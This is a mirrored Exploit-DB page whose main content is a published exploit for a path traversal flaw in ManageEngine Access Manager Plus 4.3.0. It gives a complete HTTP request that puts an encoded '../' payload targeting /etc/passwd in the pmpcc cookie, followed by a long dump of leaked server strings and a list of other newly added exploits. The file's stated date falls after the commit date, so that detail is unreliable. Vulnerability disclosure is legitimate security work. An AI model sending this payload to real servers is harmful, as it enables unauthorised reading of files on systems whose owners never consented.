bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/51222.txt
Exploit-DB d4e68dbb7e DB: 2023-04-04 
39 changes to exploits/shellcodes/ghdb

ProLink PRS1841 PLDT Home fiber - Default Password

Nacos 2.0.3 - Access Control vulnerability

sudo 1.8.0 to 1.9.12p1 - Privilege Escalation

sleuthkit 4.11.1 - Command Injection

Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)

ManageEngin AMP 4.3.0 - File-path-traversal

SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS)

AmazCart CMS 3.4 - Cross-Site-Scripting (XSS)
Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)
Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated
Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated

ChiKoi v1.0 - SQL Injection

ERPGo SaaS 3.9 - CSV Injection

GLPI  Cartography Plugin v6.0.0 - Unauthenticated Remote Code Execution (RCE)

GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin
GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion
GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure
GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)

Metform Elementor Contact Form Builder v3.1.2 - Unauthenticated Stored Cross-Site Scripting (XSS)

MyBB 1.8.32 - Remote Code Execution (RCE) (Authenticated)

Paid Memberships Pro  v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection

pimCore v5.4.18-skeleton  - Sensitive Cookie with Improper SameSite Attribute

Prizm Content Connect v10.5.1030.8315 - XXE

SLIMSV 9.5.2 - Cross-Site Scripting (XSS)

WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE

Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)
Roxy WI v6.1.0.0 - Improper Authentication Control
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload

Solaris 10 libXm - Buffer overflow Local privilege escalation

Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path

Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow

HotKey Clipboard 2.1.0.6 - Privilege Escalation Unquoted Service Path

Microsoft Exchange Active Directory Topology 15.02.1118.007 - 'Service MSExchangeADTopology' Unquoted Service Path

Windows 11 10.0.22000 -  Backup service Privilege Escalation

Windows/x86 - Create Administrator User / Dynamic PEB & EDT method null-free Shellcode (373 bytes)
2023-04-04 00:16:32 +00:00

235 lines
No EOL
11 KiB
Text
Raw Permalink Blame History

## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal
## Author: nu11secur1ty
## Date: 11.22.2023
## Vendor: https://www.manageengine.com/
## Software: https://www.manageengine.com/privileged-session-management/download.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)
## Description:
The `pmpcc` cookie is vulnerable to path traversal attacks, enabling
read access to arbitrary files on the server.
The testing payload
..././..././..././..././..././..././..././..././..././..././etc/passwd
was submitted in the pmpcc cookie.
The requested file was returned in the application's response.
The attacker easy can see all the JS structures of the server and can
perform very dangerous actions.
## STATUS: HIGH Vulnerability
[+] Exploits:
```GET
GET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1
Host: localhost:9292
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;
_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;
JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;
JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Mobile: ?0
X-Requested-With: XMLHttpRequest
Sec-CH-UA-Platform: Windows
Referer: https://localhost:9292/AMPHome.html
```
[+] Response:
```
,'js.pmp.helpCertRequest.subcontent10':'The issued certificate is
e-mailed to the user who raises the request, the user who closes the
request and also to those e-mail ids specified at the time of closing
the request.'
,'js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username'
,'js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Next
synchronization is scheduled to run on'
,'js.agent.csharp_Windows_Agent':'C# Windows Agent'
,'js.PassTrixMainTab.in_sec':'Seconds'
,'godaddy.importcsr.selectfileorpastecontent':'Either select a file or
paste the CSR content.'
,'js.connection.colors':'Colors'
,'js.general.ShareToGroups':'Share resource to user groups'
,'js.connection.mapdisk':'Drives'
,'jsp.admin.Support.User_Forums':'User Forums'
,'js.general.CreateResource.Dns_url_check':'Enter a valid URL . For
cloud services (Rackspace and AWS IAM), the DNS name <br>looks like a
URL (ex: https:\/\/identity.api.rackspacecloud.com\/v2.0)'
,'js.admin.RPA_Integration.About':'PAM360 renders bots that seamlessly
integrate and perfectly fit into the pre-designed and automated
integrations of the below listed RPA-powered platforms, to simulate
the routine manual password retrieval from the PAM360 vault.'
,'js.discovery.loadhostnamefromfile':'From file'
,'js.AddListenerDetails.Please_enter_valid_implementation_class':'Please
enter a valid Implementation Class'
,'js.general.GroupedResources':'Grouped Resources'
,'js.general.SlaveServer':'This operation is not permitted in Secondary Server.'
,'PROCESSID':'Process Id'
,'js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Services
fetched successfully'
,'assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled'
,'js.commonstr.search':'Search'
,'js.discovery.usercredential_type':'Credential Type'
,'jsp.admin.GeneralSetting.Check_high_availability_status_for':'Check
high availability status every <input type=\"text\" class=\"txtbox\"
name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"
style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"
> minutes.'
,'pki.js.help.entervalidnumber':'Please enter a valid number for
Numeric Field Default Value.'
,'js.remoteapp.fetch':'Fetch'
,'js.admin.HighAvailability.configured_successfully':'Configured Successfully'
,'js.generalSettings_searchTerm_Password_reset':'Password Reset,
Reason for password reset, disable ticket id, waiting time, wait time
for service account password reset, linux unix password reset'
,'letsencrypt.enter.domainnames':'Enter domain names'
,'js.discovery.resourcetype':'Resource Type'
,'js.HomeTab.UserTab':'Set this tab as default view for \'Users\''
,'js.report.timeline.todate':'Valid To'
,'js.general_Language_Changed_Successfully':'Language Changed Successfully'
,'js.aws.credentials.label':'AWS Credential'
,'auditpurge.helpnote1':'Enter 0 or leave the field blank to disable
purging of audit trails.'
,'js.general.user.orgn_bulkManage':'Manage Organization'
,'js.rolename.SSH_KEY':'Create\/Add key'
,'js.admin.admin.singledbmultiserver.name':'Application Scaling'
,'lets.encrypt.requestreport':'Let\'s Encrypt Requests Report'
,'js.settings.breach_settings.disable_api':'Disable API Access'
,'js.cmd.delete.not_possible':'Command cannot be deleted as it is
already added to the following command set(s).'
,'js.settings.notification.domaincontent':'Notify if domains are
expiring within'
,'js.aws.searchuser':'--Search UserName--'
,'jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketing
system settings in Admin >> General >> Ticketing System Integration.'
,'js.discovery.port':'Gateway Port'
,'usermanagement.showCertificates':'Show Certificates'
,'js.general.DestinationDirectoryCannotBeEmpty':'Destination directory
cannot be empty'
,'js.sshreport.title':'SSH Resource Report'
,'js.encryptionkey.update':'Update'
,'js.aws.regions':'Region'
,'js.settingsTitle1.UserManagement':'User Management'
,'js.passwordPolicy.setRange':'Enforce minimum or maximum password length'
,'js.commonstr.selectResources':'Select Resources'
,'RULENAME':'Rule Name'
,'jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'User
Group added successfully'
,'js.reports.SSHReports.title':'SSH Reports'
,'js.CommonStr.ValueIsLess':'value is less than 2'
,'js.discovery.discoverystatus':'Discovery Status'
,'js.settings.security_settings.Web_Access':'Web Access'
,'js.general.node_name_cannot_be_empty':'Node name cannot be empty'
,'js.deploy.audit':'Deploy Audit'
,'js.agentdiscovery.msca.title':'Microsoft Certificate Authority'
,'jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominate
user group(s) to exempt from access control.'
,'js.pki.SelectCertificateGroup':'Select Certificate Group(s)'
,'js.admin.HighAvailability.High_Availability_status':'Status'
,'settings.metracker.note0':'Disable ME Tracker if you do not wish to
allow ManageEngine to collect product usage details.'
,'SERVICENAME':'Service Name'
,'settings.metracker.note1':'Access Manager Plus server has to be
restarted for the changes to take effect.'
,'js.general.NewPinMismatch':'New PIN Mismatch'
,'js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\''
,'java.ScheduleUtil.minutes':'minutes'
,'js.admin.sdpop_change.tooltip':'Enabling this option will require
your users to provide valid Change IDs for the validation of password
access requests and other similar operations. Leaving this option
unchecked requires the users to submit valid Request IDs for
validation.'
,'js.privacy_settings.title.redact':'Redact'
,'js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25
resources can be selected'
,'js.aboutpage.websitetitle':'Website'
,'js.customize.NumericField':'Numeric Field'
,'js.please.select.file':'Please select a file to upload.'
,'js.AutoLogon.Remote_connections':'Remote Connections'
,'pki.snmp.port':'Port'
,'java.dashboardutils.TODAY':'TODAY'
,'js.schedule.starttime':'Start Time'
,'js.ssh.keypassphrase':'Passphrase'
,'js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus'
,'js.analytics.tab.ueba.msg4':'guide'
,'js.analytics.tab.ueba.msg5':'to complete the integration. For any
further questions, please write to us at
pam360-support@manageengine.com.'
,'js.reportType.Option7.UserAuditReport':'Audit Report'
,'js.common.csr':'CSR'
,'js.globalsign.reissue.order':'Reissue Order'
,'js.analytics.tab.ueba.msg6':'Build a platform of expected behavior
for individual users and entities by mapping different user accounts'
,'js.analytics.tab.ueba.msg7':'Verify actionable reports that
symbolize compromise with details about actual behavior and expected
behavior.'
,'js.resources.importcredential':'Import Credentials'
,'js.analytics.tab.ueba.msg1':'The Advanced Analytics module for
PAM360, offered via ManageEngine Log360 UEBA, analyzes logs from
different sources, including firewalls, routers, workstations,
databases, file servers and cloud services. Any deviation from normal
behavior is classified as a time, count, or pattern anomaly. It then
gives actionable insight to the IT Administrator with the use of risk
scores, anomaly trends, and intuitive reports.'
,'js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:'
,'js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360
instance, download Log360 UEBA from the below link and follow the
instructions in this'
,'js.settingsTitle2.MailServer':'Mail Server'
,'jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'Managing
AMP Encryption Key'
,'settings.unmappedmails.email':'E-mail Address'
,'amp.connection.connection_type':'Connection Type'
,'js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior based
on activity time, count, and pattern.'
,'godaddy.contactphone':'Contact Phone'
,'js.general.HelpDeskIntegrate.ClassSameException':'Class name already
implemented. Implement with some other class.'
,'js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors in
Windows devices, SQL servers, FTP servers, and network devices such as
routers, firewalls, and switches.'
,'js.rolename.freeCA.acme':'ACME'
,'digicert.label.dcv.cname':'CNAME Token'
,'js.helpcontent.createuser':'User Creation '
,'pgpkeys.key.details':'Key Information'
,'js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status'
,'js.HomeTab.TaskAuditView':'Task Audit'
,'pki.js.certs.certGroupsSharedByUserGroups':'Certificate Groups
Shared With User Group(s)'
,'js.common.importcsr.format':'(File format should be .csr)'
,'js.notificationpolicy.Submit':'Save'
,'pmp.vct.User_Audit_Configuration':'User Audit Configuration'
...
...
...
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))
## Reference:
[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)
## Proof and Exploit:
[href](https://streamable.com/scdzsb)
## Time spent
`03:00:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit Data Base https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Reference in a new issue View git blame Copy permalink